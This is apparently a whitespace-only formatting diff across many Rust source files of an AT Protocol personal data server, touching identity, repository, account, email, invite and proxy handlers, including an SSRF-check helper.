··· 16 16 use serde_json::json; 17 17 use std::sync::Arc; 18 18 use tracing::{error, info, warn}; 19 + 19 20 fn extract_client_ip(headers: &HeaderMap) -> String { 20 21 if let Some(forwarded) = headers.get("x-forwarded-for") { 21 22 if let Ok(value) = forwarded.to_str() { ··· 31 32 } 32 33 "unknown".to_string() 33 34 } 35 + 34 36 #[derive(Deserialize)] 35 37 #[serde(rename_all = "camelCase")] 36 38 pub struct CreateAccountInput { ··· 45 47 pub telegram_username: Option<String>, 46 48 pub signal_number: Option<String>, 47 49 } 50 + 48 51 #[derive(Serialize)] 49 52 #[serde(rename_all = "camelCase")] 50 53 pub struct CreateAccountOutput { ··· 53 56 pub verification_required: bool, 54 57 pub verification_channel: String, 55 58 } 59 + 56 60 pub async fn create_account( 57 61 State(state): State<AppState>, 58 62 headers: HeaderMap,
+14
src/api/identity/did.rs
··· 13 13 use serde::Deserialize; 14 14 use serde_json::json; 15 15 use tracing::{error, warn}; 16 + 16 17 #[derive(Deserialize)] 17 18 pub struct ResolveHandleParams { 18 19 pub handle: String, 19 20 } 21 + 20 22 pub async fn resolve_handle( 21 23 State(state): State<AppState>, 22 24 Query(params): Query<ResolveHandleParams>, ··· 63 65 } 64 66 } 65 67 } 68 + 66 69 pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> { 67 70 let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?; 68 71 let public_key = secret_key.public_key(); ··· 78 81 "y": y_b64 79 82 })) 80 83 } 84 + 81 85 pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse { 82 86 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 83 87 // Kinda for local dev, encode hostname if it contains port ··· 96 100 }] 97 101 })) 98 102 } 103 + 99 104 pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response { 100 105 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 101 106 let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle) ··· 174 179 }] 175 180 })).into_response() 176 181 } 182 + 177 183 pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> { 178 184 let expected_prefix = if hostname.contains(':') { 179 185 format!("did:web:{}", hostname.replace(':', "%3A")) ··· 242 248 } 243 249 } 244 250 } 251 + 245 252 #[derive(serde::Serialize)] 246 253 #[serde(rename_all = "camelCase")] 247 254 pub struct GetRecommendedDidCredentialsOutput { ··· 250 257 pub verification_methods: VerificationMethods, 251 258 pub services: Services, 252 259 } 260 + 253 261 #[derive(serde::Serialize)] 254 262 #[serde(rename_all = "camelCase")] 255 263 pub struct VerificationMethods { 256 264 pub atproto: String, 257 265 } 266 + 258 267 #[derive(serde::Serialize)] 259 268 #[serde(rename_all = "camelCase")] 260 269 pub struct Services { 261 270 pub atproto_pds: AtprotoPds, 262 271 } 272 + 263 273 #[derive(serde::Serialize)] 264 274 #[serde(rename_all = "camelCase")] 265 275 pub struct AtprotoPds { ··· 267 277 pub service_type: String, 268 278 pub endpoint: String, 269 279 } 280 + 270 281 pub async fn get_recommended_did_credentials( 271 282 State(state): State<AppState>, 272 283 headers: axum::http::HeaderMap, ··· 329 340 ) 330 341 .into_response() 331 342 } 343 + 332 344 #[derive(Deserialize)] 333 345 pub struct UpdateHandleInput { 334 346 pub handle: String, 335 347 } 348 + 336 349 pub async fn update_handle( 337 350 State(state): State<AppState>, 338 351 headers: axum::http::HeaderMap, ··· 410 423 } 411 424 } 412 425 } 426 + 413 427 pub async fn well_known_atproto_did( 414 428 State(state): State<AppState>, 415 429 headers: HeaderMap,
+1
src/api/identity/mod.rs
··· 1 1 pub mod account; 2 2 pub mod did; 3 3 pub mod plc; 4 + 4 5 pub use account::create_account; 5 6 pub use did::{ 6 7 get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, well_known_did,
+1
src/api/identity/plc/mod.rs
··· 1 1 mod request; 2 2 mod sign; 3 3 mod submit; 4 + 4 5 pub use request::request_plc_operation_signature; 5 6 pub use sign::{sign_plc_operation, ServiceInput, SignPlcOperationInput, SignPlcOperationOutput}; 6 7 pub use submit::{submit_plc_operation, SubmitPlcOperationInput};
+2
src/api/identity/plc/request.rs
··· 9 9 use chrono::{Duration, Utc}; 10 10 use serde_json::json; 11 11 use tracing::{error, info, warn}; 12 + 12 13 fn generate_plc_token() -> String { 13 14 crate::util::generate_token_code() 14 15 } 16 + 15 17 pub async fn request_plc_operation_signature( 16 18 State(state): State<AppState>, 17 19 headers: axum::http::HeaderMap,
+4
src/api/identity/plc/sign.rs
··· 16 16 use serde_json::{json, Value}; 17 17 use std::collections::HashMap; 18 18 use tracing::{error, info, warn}; 19 + 19 20 #[derive(Debug, Deserialize)] 20 21 #[serde(rename_all = "camelCase")] 21 22 pub struct SignPlcOperationInput { ··· 25 26 pub verification_methods: Option<HashMap<String, String>>, 26 27 pub services: Option<HashMap<String, ServiceInput>>, 27 28 } 29 + 28 30 #[derive(Debug, Deserialize, Clone)] 29 31 pub struct ServiceInput { 30 32 #[serde(rename = "type")] 31 33 pub service_type: String, 32 34 pub endpoint: String, 33 35 } 36 + 34 37 #[derive(Debug, Serialize)] 35 38 pub struct SignPlcOperationOutput { 36 39 pub operation: Value, 37 40 } 41 + 38 42 pub async fn sign_plc_operation( 39 43 State(state): State<AppState>, 40 44 headers: axum::http::HeaderMap,
+2
src/api/identity/plc/submit.rs
··· 12 12 use serde::Deserialize; 13 13 use serde_json::{json, Value}; 14 14 use tracing::{error, info, warn}; 15 + 15 16 #[derive(Debug, Deserialize)] 16 17 pub struct SubmitPlcOperationInput { 17 18 pub operation: Value, 18 19 } 20 + 19 21 pub async fn submit_plc_operation( 20 22 State(state): State<AppState>, 21 23 headers: axum::http::HeaderMap,
+1
src/api/mod.rs
··· 13 13 pub mod server; 14 14 pub mod temp; 15 15 pub mod validation; 16 + 16 17 pub use error::ApiError; 17 18 pub use proxy_client::{proxy_client, validate_at_uri, validate_did, validate_limit, AtUriParts};
+3
src/api/moderation/mod.rs
··· 9 9 use serde::{Deserialize, Serialize}; 10 10 use serde_json::{Value, json}; 11 11 use tracing::error; 12 + 12 13 #[derive(Deserialize)] 13 14 #[serde(rename_all = "camelCase")] 14 15 pub struct CreateReportInput { ··· 16 17 pub reason: Option<String>, 17 18 pub subject: Value, 18 19 } 20 + 19 21 #[derive(Serialize)] 20 22 #[serde(rename_all = "camelCase")] 21 23 pub struct CreateReportOutput { ··· 26 28 pub reported_by: String, 27 29 pub created_at: String, 28 30 } 31 + 29 32 pub async fn create_report( 30 33 State(state): State<AppState>, 31 34 headers: axum::http::HeaderMap,
+1
src/api/notification/mod.rs
··· 1 1 mod register_push; 2 + 2 3 pub use register_push::register_push;
+3
src/api/notification/register_push.rs
··· 10 10 use serde::Deserialize; 11 11 use serde_json::json; 12 12 use tracing::{error, info}; 13 + 13 14 #[derive(Deserialize)] 14 15 #[serde(rename_all = "camelCase")] 15 16 pub struct RegisterPushInput { ··· 18 19 pub platform: String, 19 20 pub app_id: String, 20 21 } 22 + 21 23 const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"]; 24 + 22 25 pub async fn register_push( 23 26 State(state): State<AppState>, 24 27 headers: HeaderMap,
+4
src/api/notification_prefs.rs
··· 10 10 use tracing::info; 11 11 use crate::auth::validate_bearer_token; 12 12 use crate::state::AppState; 13 + 13 14 #[derive(Serialize)] 14 15 #[serde(rename_all = "camelCase")] 15 16 pub struct NotificationPrefsResponse { ··· 22 23 pub signal_number: Option<String>, 23 24 pub signal_verified: bool, 24 25 } 26 + 25 27 pub async fn get_notification_prefs( 26 28 State(state): State<AppState>, 27 29 headers: HeaderMap, ··· 96 98 }) 97 99 .into_response() 98 100 } 101 + 99 102 #[derive(Deserialize)] 100 103 #[serde(rename_all = "camelCase")] 101 104 pub struct UpdateNotificationPrefsInput { ··· 104 107 pub telegram_username: Option<String>, 105 108 pub signal_number: Option<String>, 106 109 } 110 + 107 111 pub async fn update_notification_prefs( 108 112 State(state): State<AppState>, 109 113 headers: HeaderMap,
+1
src/api/proxy.rs
··· 8 8 use crate::api::proxy_client::proxy_client; 9 9 use std::collections::HashMap; 10 10 use tracing::{error, info}; 11 + 11 12 pub async fn proxy_handler( 12 13 State(state): State<AppState>, 13 14 Path(method): Path<String>,
+15
src/api/proxy_client.rs
··· 3 3 use std::sync::OnceLock; 4 4 use std::time::Duration; 5 5 use tracing::warn; 6 + 6 7 pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10); 7 8 pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30); 8 9 pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5); 9 10 pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024; 11 + 10 12 static PROXY_CLIENT: OnceLock<Client> = OnceLock::new(); 13 + 11 14 pub fn proxy_client() -> &'static Client { 12 15 PROXY_CLIENT.get_or_init(|| { 13 16 ClientBuilder::new() ··· 20 23 .expect("Failed to build HTTP client - this indicates a TLS or system configuration issue") 21 24 }) 22 25 } 26 + 23 27 pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> { 24 28 let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?; 25 29 let scheme = parsed.scheme(); ··· 61 65 } 62 66 Ok(()) 63 67 } 68 + 64 69 fn is_unicast_ip(ip: &IpAddr) -> bool { 65 70 match ip { 66 71 IpAddr::V4(v4) => { ··· 74 79 IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(), 75 80 } 76 81 } 82 + 77 83 fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool { 78 84 let octets = ip.octets(); 79 85 octets[0] == 10 ··· 81 87 || (octets[0] == 192 && octets[1] == 168) 82 88 || (octets[0] == 169 && octets[1] == 254) 83 89 } 90 + 84 91 #[derive(Debug, Clone)] 85 92 pub enum SsrfError { 86 93 InvalidUrl, ··· 89 96 NonUnicastIp(String), 90 97 DnsResolutionFailed(String), 91 98 } 99 + 92 100 impl std::fmt::Display for SsrfError { 93 101 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 94 102 match self { ··· 100 108 } 101 109 } 102 110 } 111 + 103 112 impl std::error::Error for SsrfError {} 113 + 104 114 pub const HEADERS_TO_FORWARD: &[&str] = &[ 105 115 "accept-language", 106 116 "atproto-accept-labelers", ··· 112 122 "retry-after", 113 123 "content-type", 114 124 ]; 125 + 115 126 pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> { 116 127 if !uri.starts_with("at://") { 117 128 return Err("URI must start with at://"); ··· 137 148 rkey: parts.get(2).map(|s| s.to_string()), 138 149 }) 139 150 } 151 + 140 152 #[derive(Debug, Clone)] 141 153 pub struct AtUriParts { 142 154 pub did: String, 143 155 pub collection: Option<String>, 144 156 pub rkey: Option<String>, 145 157 } 158 + 146 159 pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 { 147 160 match limit { 148 161 Some(l) if l == 0 => default, ··· 151 164 None => default, 152 165 } 153 166 } 167 + 154 168 pub fn validate_did(did: &str) -> Result<(), &'static str> { 155 169 if !did.starts_with("did:") { 156 170 return Err("Invalid DID format"); ··· 165 179 } 166 180 Ok(()) 167 181 } 182 + 168 183 #[cfg(test)] 169 184 mod tests { 170 185 use super::*;
+19
src/api/read_after_write.rs
··· 17 17 use std::collections::HashMap; 18 18 use tracing::{error, info, warn}; 19 19 use uuid::Uuid; 20 + 20 21 pub const REPO_REV_HEADER: &str = "atproto-repo-rev"; 21 22 pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag"; 23 + 22 24 #[derive(Debug, Clone, Serialize, Deserialize)] 23 25 #[serde(rename_all = "camelCase")] 24 26 pub struct PostRecord { ··· 39 41 #[serde(flatten)] 40 42 pub extra: HashMap<String, Value>, 41 43 } 44 + 42 45 #[derive(Debug, Clone, Serialize, Deserialize)] 43 46 #[serde(rename_all = "camelCase")] 44 47 pub struct ProfileRecord { ··· 55 58 #[serde(flatten)] 56 59 pub extra: HashMap<String, Value>, 57 60 } 61 + 58 62 #[derive(Debug, Clone)] 59 63 pub struct RecordDescript<T> { 60 64 pub uri: String, ··· 62 66 pub indexed_at: DateTime<Utc>, 63 67 pub record: T, 64 68 } 69 + 65 70 #[derive(Debug, Clone, Serialize, Deserialize)] 66 71 #[serde(rename_all = "camelCase")] 67 72 pub struct LikeRecord { ··· 72 77 #[serde(flatten)] 73 78 pub extra: HashMap<String, Value>, 74 79 } 80 + 75 81 #[derive(Debug, Clone, Serialize, Deserialize)] 76 82 #[serde(rename_all = "camelCase")] 77 83 pub struct LikeSubject { 78 84 pub uri: String, 79 85 pub cid: String, 80 86 } 87 + 81 88 #[derive(Debug, Default)] 82 89 pub struct LocalRecords { 83 90 pub count: usize, ··· 85 92 pub posts: Vec<RecordDescript<PostRecord>>, 86 93 pub likes: Vec<RecordDescript<LikeRecord>>, 87 94 } 95 + 88 96 pub async fn get_records_since_rev( 89 97 state: &AppState, 90 98 did: &str, ··· 187 195 } 188 196 Ok(result) 189 197 } 198 + 190 199 pub fn get_local_lag(local: &LocalRecords) -> Option<i64> { 191 200 let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at); 192 201 for post in &local.posts { ··· 205 214 } 206 215 oldest.map(|o| (Utc::now() - o).num_milliseconds()) 207 216 } 217 + 208 218 pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> { 209 219 headers 210 220 .get(REPO_REV_HEADER) 211 221 .and_then(|h| h.to_str().ok()) 212 222 .map(|s| s.to_string()) 213 223 } 224 + 214 225 #[derive(Debug)] 215 226 pub struct ProxyResponse { 216 227 pub status: StatusCode, 217 228 pub headers: HeaderMap, 218 229 pub body: bytes::Bytes, 219 230 } 231 + 220 232 pub async fn proxy_to_appview( 221 233 method: &str, 222 234 params: &HashMap<String, String>, ··· 297 309 } 298 310 } 299 311 } 312 + 300 313 pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response { 301 314 let mut response = (StatusCode::OK, Json(data)).into_response(); 302 315 if let Some(lag_ms) = lag { ··· 308 321 } 309 322 response 310 323 } 324 + 311 325 #[derive(Debug, Clone, Serialize, Deserialize)] 312 326 #[serde(rename_all = "camelCase")] 313 327 pub struct AuthorView { ··· 320 334 #[serde(flatten)] 321 335 pub extra: HashMap<String, Value>, 322 336 } 337 + 323 338 #[derive(Debug, Clone, Serialize, Deserialize)] 324 339 #[serde(rename_all = "camelCase")] 325 340 pub struct PostView { ··· 341 356 #[serde(flatten)] 342 357 pub extra: HashMap<String, Value>, 343 358 } 359 + 344 360 #[derive(Debug, Clone, Serialize, Deserialize)] 345 361 #[serde(rename_all = "camelCase")] 346 362 pub struct FeedViewPost { ··· 354 370 #[serde(flatten)] 355 371 pub extra: HashMap<String, Value>, 356 372 } 373 + 357 374 #[derive(Debug, Clone, Serialize, Deserialize)] 358 375 pub struct FeedOutput { 359 376 pub feed: Vec<FeedViewPost>, 360 377 #[serde(skip_serializing_if = "Option::is_none")] 361 378 pub cursor: Option<String>, 362 379 } 380 + 363 381 pub fn format_local_post( 364 382 descript: &RecordDescript<PostRecord>, 365 383 author_did: &str, ··· 387 405 extra: HashMap::new(), 388 406 } 389 407 } 408 + 390 409 pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) { 391 410 if posts.is_empty() { 392 411 return;
+7
src/api/repo/blob.rs
··· 14 14 use sha2::{Digest, Sha256}; 15 15 use std::str::FromStr; 16 16 use tracing::error; 17 + 17 18 const MAX_BLOB_SIZE: usize = 1_000_000; 19 + 18 20 pub async fn upload_blob( 19 21 State(state): State<AppState>, 20 22 headers: axum::http::HeaderMap, ··· 154 156 })) 155 157 .into_response() 156 158 } 159 + 157 160 #[derive(Deserialize)] 158 161 pub struct ListMissingBlobsParams { 159 162 pub limit: Option<i64>, 160 163 pub cursor: Option<String>, 161 164 } 165 + 162 166 #[derive(Serialize)] 163 167 #[serde(rename_all = "camelCase")] 164 168 pub struct RecordBlob { 165 169 pub cid: String, 166 170 pub record_uri: String, 167 171 } 172 + 168 173 #[derive(Serialize)] 169 174 pub struct ListMissingBlobsOutput { 170 175 pub cursor: Option<String>, 171 176 pub blobs: Vec<RecordBlob>, 172 177 } 178 + 173 179 fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) { 174 180 if let Some(obj) = val.as_object() { 175 181 if let Some(type_val) = obj.get("$type") { ··· 192 198 } 193 199 } 194 200 } 201 + 195 202 pub async fn list_missing_blobs( 196 203 State(state): State<AppState>, 197 204 headers: axum::http::HeaderMap,
+3
src/api/repo/import.rs
··· 11 11 }; 12 12 use serde_json::json; 13 13 use tracing::{debug, error, info, warn}; 14 + 14 15 const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024; 15 16 const DEFAULT_MAX_BLOCKS: usize = 50000; 17 + 16 18 pub async fn import_repo( 17 19 State(state): State<AppState>, 18 20 headers: axum::http::HeaderMap, ··· 355 357 } 356 358 } 357 359 } 360 + 358 361 async fn sequence_import_event( 359 362 state: &AppState, 360 363 did: &str,
+2
src/api/repo/meta.rs
··· 7 7 }; 8 8 use serde::Deserialize; 9 9 use serde_json::json; 10 + 10 11 #[derive(Deserialize)] 11 12 pub struct DescribeRepoInput { 12 13 pub repo: String, 13 14 } 15 + 14 16 pub async fn describe_repo( 15 17 State(state): State<AppState>, 16 18 Query(input): Query<DescribeRepoInput>,
+1
src/api/repo/mod.rs
··· 2 2 pub mod import; 3 3 pub mod meta; 4 4 pub mod record; 5 + 5 6 pub use blob::{list_missing_blobs, upload_blob}; 6 7 pub use import::import_repo; 7 8 pub use meta::describe_repo;
+7
src/api/repo/record/batch.rs
··· 17 17 use std::str::FromStr; 18 18 use std::sync::Arc; 19 19 use tracing::error; 20 + 20 21 const MAX_BATCH_WRITES: usize = 200; 22 + 21 23 #[derive(Deserialize)] 22 24 #[serde(tag = "$type")] 23 25 pub enum WriteOp { ··· 36 38 #[serde(rename = "com.atproto.repo.applyWrites#delete")] 37 39 Delete { collection: String, rkey: String }, 38 40 } 41 + 39 42 #[derive(Deserialize)] 40 43 #[serde(rename_all = "camelCase")] 41 44 pub struct ApplyWritesInput { ··· 44 47 pub writes: Vec<WriteOp>, 45 48 pub swap_commit: Option<String>, 46 49 } 50 + 47 51 #[derive(Serialize)] 48 52 #[serde(tag = "$type")] 49 53 pub enum WriteResult { ··· 54 58 #[serde(rename = "com.atproto.repo.applyWrites#deleteResult")] 55 59 DeleteResult {}, 56 60 } 61 + 57 62 #[derive(Serialize)] 58 63 pub struct ApplyWritesOutput { 59 64 pub commit: CommitInfo, 60 65 pub results: Vec<WriteResult>, 61 66 } 67 + 62 68 #[derive(Serialize)] 63 69 pub struct CommitInfo { 64 70 pub cid: String, 65 71 pub rev: String, 66 72 } 73 + 67 74 pub async fn apply_writes( 68 75 State(state): State<AppState>, 69 76 headers: axum::http::HeaderMap,
+2
src/api/repo/record/delete.rs
··· 16 16 use std::str::FromStr; 17 17 use std::sync::Arc; 18 18 use tracing::error; 19 + 19 20 #[derive(Deserialize)] 20 21 pub struct DeleteRecordInput { 21 22 pub repo: String, ··· 26 27 #[serde(rename = "swapCommit")] 27 28 pub swap_commit: Option<String>, 28 29 } 30 + 29 31 pub async fn delete_record( 30 32 State(state): State<AppState>, 31 33 headers: HeaderMap,
+1
src/api/repo/record/mod.rs
··· 4 4 pub mod utils; 5 5 pub mod validation; 6 6 pub mod write; 7 + 7 8 pub use batch::apply_writes; 8 9 pub use delete::{DeleteRecordInput, delete_record}; 9 10 pub use read::{GetRecordInput, ListRecordsInput, ListRecordsOutput, get_record, list_records};
+2
src/api/repo/record/read.rs
··· 12 12 use std::collections::HashMap; 13 13 use std::str::FromStr; 14 14 use tracing::error; 15 + 15 16 #[derive(Deserialize)] 16 17 pub struct GetRecordInput { 17 18 pub repo: String, ··· 19 20 pub rkey: String, 20 21 pub cid: Option<String>, 21 22 } 23 + 22 24 pub async fn get_record( 23 25 State(state): State<AppState>, 24 26 Query(input): Query<GetRecordInput>,
+4
src/api/repo/record/utils.rs
··· 28 28 rev: &'a str, 29 29 version: i64, 30 30 } 31 + 31 32 fn create_signed_commit( 32 33 did: &str, 33 34 data: Cid, ··· 68 69 .map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?; 69 70 Ok((signed_bytes, sig_bytes)) 70 71 } 72 + 71 73 pub enum RecordOp { 72 74 Create { collection: String, rkey: String, cid: Cid }, 73 75 Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> }, 74 76 Delete { collection: String, rkey: String, prev: Option<Cid> }, 75 77 } 78 + 76 79 pub struct CommitResult { 77 80 pub commit_cid: Cid, 78 81 pub rev: String, 79 82 } 83 + 80 84 pub async fn commit_and_log( 81 85 state: &AppState, 82 86 did: &str,
+1
src/api/repo/record/validation.rs
··· 5 5 Json, 6 6 }; 7 7 use serde_json::json; 8 + 8 9 pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Response> { 9 10 let validator = RecordValidator::new(); 10 11 match validator.validate(record, collection) {
+2
src/api/repo/record/write.rs
··· 18 18 use std::sync::Arc; 19 19 use tracing::error; 20 20 use uuid::Uuid; 21 + 21 22 pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 22 23 let row = sqlx::query( 23 24 r#" ··· 44 45 None => Ok(false), 45 46 } 46 47 } 48 + 47 49 pub async fn prepare_repo_write( 48 50 state: &AppState, 49 51 headers: &HeaderMap,
+8
src/api/server/account_status.rs
··· 12 12 use serde_json::json; 13 13 use tracing::{error, info, warn}; 14 14 use uuid::Uuid; 15 + 15 16 #[derive(Serialize)] 16 17 #[serde(rename_all = "camelCase")] 17 18 pub struct CheckAccountStatusOutput { ··· 25 26 pub expected_blobs: i64, 26 27 pub imported_blobs: i64, 27 28 } 29 + 28 30 pub async fn check_account_status( 29 31 State(state): State<AppState>, 30 32 headers: axum::http::HeaderMap, ··· 94 96 ) 95 97 .into_response() 96 98 } 99 + 97 100 pub async fn activate_account( 98 101 State(state): State<AppState>, 99 102 headers: axum::http::HeaderMap, ··· 133 136 } 134 137 } 135 138 } 139 + 136 140 #[derive(Deserialize)] 137 141 #[serde(rename_all = "camelCase")] 138 142 pub struct DeactivateAccountInput { 139 143 pub delete_after: Option<String>, 140 144 } 145 + 141 146 pub async fn deactivate_account( 142 147 State(state): State<AppState>, 143 148 headers: axum::http::HeaderMap, ··· 178 183 } 179 184 } 180 185 } 186 + 181 187 pub async fn request_account_delete( 182 188 State(state): State<AppState>, 183 189 headers: axum::http::HeaderMap, ··· 232 238 info!("Account deletion requested for user {}", did); 233 239 (StatusCode::OK, Json(json!({}))).into_response() 234 240 } 241 + 235 242 #[derive(Deserialize)] 236 243 pub struct DeleteAccountInput { 237 244 pub did: String, 238 245 pub password: String, 239 246 pub token: String, 240 247 } 248 + 241 249 pub async fn delete_account( 242 250 State(state): State<AppState>, 243 251 Json(input): Json<DeleteAccountInput>,
+8
src/api/server/app_password.rs
··· 11 11 use serde::{Deserialize, Serialize}; 12 12 use serde_json::json; 13 13 use tracing::{error, warn}; 14 + 14 15 #[derive(Serialize)] 15 16 #[serde(rename_all = "camelCase")] 16 17 pub struct AppPassword { ··· 18 19 pub created_at: String, 19 20 pub privileged: bool, 20 21 } 22 + 21 23 #[derive(Serialize)] 22 24 pub struct ListAppPasswordsOutput { 23 25 pub passwords: Vec<AppPassword>, 24 26 } 27 + 25 28 pub async fn list_app_passwords( 26 29 State(state): State<AppState>, 27 30 BearerAuth(auth_user): BearerAuth, ··· 54 57 } 55 58 } 56 59 } 60 + 57 61 #[derive(Deserialize)] 58 62 pub struct CreateAppPasswordInput { 59 63 pub name: String, 60 64 pub privileged: Option<bool>, 61 65 } 66 + 62 67 #[derive(Serialize)] 63 68 #[serde(rename_all = "camelCase")] 64 69 pub struct CreateAppPasswordOutput { ··· 67 72 pub created_at: String, 68 73 pub privileged: bool, 69 74 } 75 + 70 76 pub async fn create_app_password( 71 77 State(state): State<AppState>, 72 78 headers: HeaderMap, ··· 146 152 } 147 153 } 148 154 } 155 + 149 156 #[derive(Deserialize)] 150 157 pub struct RevokeAppPasswordInput { 151 158 pub name: String, 152 159 } 160 + 153 161 pub async fn revoke_app_password( 154 162 State(state): State<AppState>, 155 163 BearerAuth(auth_user): BearerAuth,
+7
src/api/server/email.rs
··· 10 10 use serde::Deserialize; 11 11 use serde_json::json; 12 12 use tracing::{error, info, warn}; 13 + 13 14 fn generate_confirmation_code() -> String { 14 15 crate::util::generate_token_code() 15 16 } 17 + 16 18 #[derive(Deserialize)] 17 19 #[serde(rename_all = "camelCase")] 18 20 pub struct RequestEmailUpdateInput { 19 21 pub email: String, 20 22 } 23 + 21 24 pub async fn request_email_update( 22 25 State(state): State<AppState>, 23 26 headers: axum::http::HeaderMap, ··· 119 122 info!("Email update requested for user {}", user_id); 120 123 (StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response() 121 124 } 125 + 122 126 #[derive(Deserialize)] 123 127 #[serde(rename_all = "camelCase")] 124 128 pub struct ConfirmEmailInput { 125 129 pub email: String, 126 130 pub token: String, 127 131 } 132 + 128 133 pub async fn confirm_email( 129 134 State(state): State<AppState>, 130 135 headers: axum::http::HeaderMap, ··· 236 241 info!("Email updated for user {}", user_id); 237 242 (StatusCode::OK, Json(json!({}))).into_response() 238 243 } 244 + 239 245 #[derive(Deserialize)] 240 246 #[serde(rename_all = "camelCase")] 241 247 pub struct UpdateEmailInput { ··· 244 250 pub email_auth_factor: Option<bool>, 245 251 pub token: Option<String>, 246 252 } 253 + 247 254 pub async fn update_email( 248 255 State(state): State<AppState>, 249 256 headers: axum::http::HeaderMap,
+12
src/api/server/invite.rs
··· 10 10 use serde::{Deserialize, Serialize}; 11 11 use tracing::error; 12 12 use uuid::Uuid; 13 + 13 14 #[derive(Deserialize)] 14 15 #[serde(rename_all = "camelCase")] 15 16 pub struct CreateInviteCodeInput { 16 17 pub use_count: i32, 17 18 pub for_account: Option<String>, 18 19 } 20 + 19 21 #[derive(Serialize)] 20 22 pub struct CreateInviteCodeOutput { 21 23 pub code: String, 22 24 } 25 + 23 26 pub async fn create_invite_code( 24 27 State(state): State<AppState>, 25 28 BearerAuth(auth_user): BearerAuth, ··· 81 84 } 82 85 } 83 86 } 87 + 84 88 #[derive(Deserialize)] 85 89 #[serde(rename_all = "camelCase")] 86 90 pub struct CreateInviteCodesInput { ··· 88 92 pub use_count: i32, 89 93 pub for_accounts: Option<Vec<String>>, 90 94 } 95 + 91 96 #[derive(Serialize)] 92 97 pub struct CreateInviteCodesOutput { 93 98 pub codes: Vec<AccountCodes>, 94 99 } 100 + 95 101 #[derive(Serialize)] 96 102 pub struct AccountCodes { 97 103 pub account: String, 98 104 pub codes: Vec<String>, 99 105 } 106 + 100 107 pub async fn create_invite_codes( 101 108 State(state): State<AppState>, 102 109 BearerAuth(auth_user): BearerAuth, ··· 172 179 } 173 180 Json(CreateInviteCodesOutput { codes: result_codes }).into_response() 174 181 } 182 + 175 183 #[derive(Deserialize)] 176 184 #[serde(rename_all = "camelCase")] 177 185 pub struct GetAccountInviteCodesParams { 178 186 pub include_used: Option<bool>, 179 187 pub create_available: Option<bool>, 180 188 } 189 + 181 190 #[derive(Serialize)] 182 191 #[serde(rename_all = "camelCase")] 183 192 pub struct InviteCode { ··· 189 198 pub created_at: String, 190 199 pub uses: Vec<InviteCodeUse>, 191 200 } 201 + 192 202 #[derive(Serialize)] 193 203 #[serde(rename_all = "camelCase")] 194 204 pub struct InviteCodeUse { 195 205 pub used_by: String, 196 206 pub used_at: String, 197 207 } 208 + 198 209 #[derive(Serialize)] 199 210 pub struct GetAccountInviteCodesOutput { 200 211 pub codes: Vec<InviteCode>, 201 212 } 213 + 202 214 pub async fn get_account_invite_codes( 203 215 State(state): State<AppState>, 204 216 BearerAuth(auth_user): BearerAuth,
+1
src/api/server/mod.rs
··· 7 7 pub mod service_auth; 8 8 pub mod session; 9 9 pub mod signing_key; 10 + 10 11 pub use account_status::{ 11 12 activate_account, check_account_status, deactivate_account, delete_account, 12 13 request_account_delete,
+5
src/api/server/password.rs
··· 10 10 use serde::Deserialize; 11 11 use serde_json::json; 12 12 use tracing::{error, info, warn}; 13 + 13 14 fn generate_reset_code() -> String { 14 15 crate::util::generate_token_code() 15 16 } ··· 28 29 } 29 30 "unknown".to_string() 30 31 } 32 + 31 33 #[derive(Deserialize)] 32 34 pub struct RequestPasswordResetInput { 33 35 pub email: String, 34 36 } 37 + 35 38 pub async fn request_password_reset( 36 39 State(state): State<AppState>, 37 40 headers: HeaderMap, ··· 102 105 info!("Password reset requested for user {}", user_id); 103 106 (StatusCode::OK, Json(json!({}))).into_response() 104 107 } 108 + 105 109 #[derive(Deserialize)] 106 110 pub struct ResetPasswordInput { 107 111 pub token: String, 108 112 pub password: String, 109 113 } 114 + 110 115 pub async fn reset_password( 111 116 State(state): State<AppState>, 112 117 headers: HeaderMap,
+3
src/api/server/service_auth.rs
··· 9 9 use serde::{Deserialize, Serialize}; 10 10 use serde_json::json; 11 11 use tracing::error; 12 + 12 13 #[derive(Deserialize)] 13 14 pub struct GetServiceAuthParams { 14 15 pub aud: String, 15 16 pub lxm: Option<String>, 16 17 pub exp: Option<i64>, 17 18 } 19 + 18 20 #[derive(Serialize)] 19 21 pub struct GetServiceAuthOutput { 20 22 pub token: String, 21 23 } 24 + 22 25 pub async fn get_service_auth( 23 26 State(state): State<AppState>, 24 27 headers: axum::http::HeaderMap,
+12
